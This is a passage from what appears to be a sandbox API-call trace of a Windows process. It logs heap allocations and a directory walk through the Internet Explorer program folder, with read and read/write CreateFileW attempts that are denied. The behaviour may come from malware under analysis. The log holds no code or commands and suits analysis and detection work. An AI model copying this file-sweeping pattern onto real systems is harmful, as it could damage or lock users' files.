dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0089.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.295] AreFileApisANSI () returned 1 [0089.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer", lpUsedDefaultChar=0x0) returned 35 [0089.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0089.296] AreFileApisANSI () returned 1 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0089.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer") returned 35 [0089.296] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer" (normalized: "c:\\program files\\internet explorer"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.296] GetLastError () returned 0x5 [0089.296] GetLastError () returned 0x5 [0089.296] SetLastError (dwErrCode=0x5) [0089.296] GetLastError () returned 0x5 [0089.296] SetLastError (dwErrCode=0x5) [0089.296] GetLastError () returned 0x5 [0089.296] SetLastError (dwErrCode=0x5) [0089.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0089.296] AreFileApisANSI () returned 1 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0089.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0089.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer") returned 35 [0089.296] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer" (normalized: "c:\\program files\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.500] GetLastError () returned 0x5 [0089.500] GetLastError () returned 0x5 [0089.500] SetLastError (dwErrCode=0x5) [0089.500] GetLastError () returned 0x5 [0089.500] SetLastError (dwErrCode=0x5) [0089.500] GetLastError () returned 0x5 [0089.500] SetLastError (dwErrCode=0x5) [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0089.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.500] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0089.501] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x3b40933c, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b40933c, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Java", cAlternateFileName="")) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0089.501] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78410 [0089.501] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b3e2eae, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b3e2eae, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.501] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0089.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0089.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0089.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0089.502] AreFileApisANSI () returned 1 [0089.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US", lpUsedDefaultChar=0x0) returned 41 [0089.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.502] AreFileApisANSI () returned 1 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0089.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67240 [0089.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=41 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US") returned 41 [0089.502] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US" (normalized: "c:\\program files\\internet explorer\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.502] GetLastError () returned 0x5 [0089.502] GetLastError () returned 0x5 [0089.502] SetLastError (dwErrCode=0x5) [0089.502] GetLastError () returned 0x5 [0089.502] SetLastError (dwErrCode=0x5) [0089.502] GetLastError () returned 0x5 [0089.502] SetLastError (dwErrCode=0x5) [0089.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0089.503] AreFileApisANSI () returned 1 [0089.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67660 [0089.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=41 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US") returned 41 [0089.503] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US" (normalized: "c:\\program files\\internet explorer\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.503] GetLastError () returned 0x5 [0089.503] GetLastError () returned 0x5 [0089.503] SetLastError (dwErrCode=0x5) [0089.503] GetLastError () returned 0x5 [0089.503] SetLastError (dwErrCode=0x5) [0089.503] GetLastError () returned 0x5 [0089.503] SetLastError (dwErrCode=0x5) [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0089.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a630 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0089.503] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0089.504] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0089.504] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0d83d92, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa21685bc, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.504] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b2dfe94, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7f0f18af, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x68e10600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0089.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.505] AreFileApisANSI () returned 1 [0089.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpUsedDefaultChar=0x0) returned 56 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0089.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.505] AreFileApisANSI () returned 1 [0089.505] MultiByteToWideChar (in: CodePage=0x0, 